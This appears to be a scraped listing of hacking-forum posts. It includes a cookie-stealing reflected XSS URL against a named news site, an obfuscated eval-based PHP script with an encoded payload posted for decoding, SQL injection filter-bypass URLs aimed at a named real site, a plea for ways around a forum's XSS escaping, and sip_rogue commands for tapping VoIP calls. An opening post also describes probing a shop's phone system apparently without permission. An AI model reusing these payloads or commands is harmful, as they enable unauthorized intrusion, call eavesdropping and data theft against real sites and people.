I was not able to exploit any further, as my significant other was catching on to what I was doing.
But with it being tied into the Cisco phones, I would place a bet that it is tied into the same system as the cash registers. (just speculating here)
So happy hacking!
forbes [XSS] (no replies)
http://search.forbes.com/search/colArchiveSearch?author="><script>alert(document.cookie)</script>
Hello (1 reply)
Hello guys i am longrifle0x, security researcher
Please Help Decoding php script (1 reply)
I've tried to decode this php script, but I don't have much luck.
Can someone please try to decode this?
Thanks in advance!
<?php $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0xe60;eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NGM5KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdFbnRlcnlvdXdraFJIWUtOV09VVEFhQmJDY0RkRmZHZ0lpSmpMbE1tUHBRcVNzVnZYeFp6MDEyMzQ1Njc4OSsvPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='));return;?>T_TdY~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SO
Bypassed Waf . think like double query will work, .cant bypass that. (1 reply)
PHP Code 1:
http://gpl4you.com/myinternship.php?id=1314&page=0
How i bypassed
PHP Code 2:
http://gpl4you.com/myinternship.php?id=1314&page=0+/*!UnIoN*//*%0A*//*!SeLeCt*//*%0A*/+1--+
Now wot to do
some thing like
PHP Code3:
http://gpl4you.com/myinternship.php?id=1314&page=0%20and%20%28/*%0A*//*!SeLeCt*//*%0A*/%20*%20from%20%28/*%0A*//*!SeLeCt*//*%0A*/%20/*%0A*/%20name_const%28version%28%29,1%29/*%0A*/%20,/*%0A*/%20name_const%28version%28%29/*%0A*/%20,1%29%29a%29
Simply help me bypassing Waf in double query or if something else can be done.
Thnx guys.
VaIbS
Are there any XSS vulnerabilities in SMF 2.0.2? (2 replies)
hi, i'm a noob at this stuff, but my friend hosts a forum (which uses SMF 2.0.2), and as far as i know, anywhere there's a place for user input (be it posting a thread, the title of a thread, the search bar, editing your profile info, etc.), it will convert
" to &quot;
< to &lt;
> to &gt;
' to &#039;
and as such, there seems to be no way to get out of attributes or do anything. also, there's no way to post a link or link to a external site picture (say, for your avatar) w/o it automatically appending an "http://" prefix.
can anyone think of a way to get past all this filtering?
voip Application-Level Interception need some adivce/help (1 reply)
I need help I work as sec analyst for a notable company in my country. I'm currently in the activity of assessing VOIP setup. I'm using Application-Level Interception Techniques to test the setup weakness. The tool i'm using to conduct interception level attack is sip_rogue. Sip_rogue is included in bt4. The attack allows you as attacker to listen the conversation occurring between sip phones. The commands are :-
sip_rogue
telnet localhost 6060
Connection 0
create sipudpport port
create sipdispatcher disp
create sipregistrarconnector reg to 10.1.101.2:5060 with the domain
10.1.101.2
create rtphandler rtp
create sipendpoint hacker
issue hacker accept calls
issue hacker relay calls to sip:3500@10.1.100.35
issue hacker tap calls to sip:4000@10.1.100.40 (the attacker)
In the original attack mentioned in hacking exposed VOIP: voice over IP security secret and solution. The victim and the attacker in on the same vlan as proxy server but in my case its different VLAN. As i pick the fone (ext 4000) to listen on the conversation i just get the dial tone. I'm using ettercap to direct the traffic from the victim ip phone to bt4 machine running sip_rogue application.
I hope i can be helped with. Thanks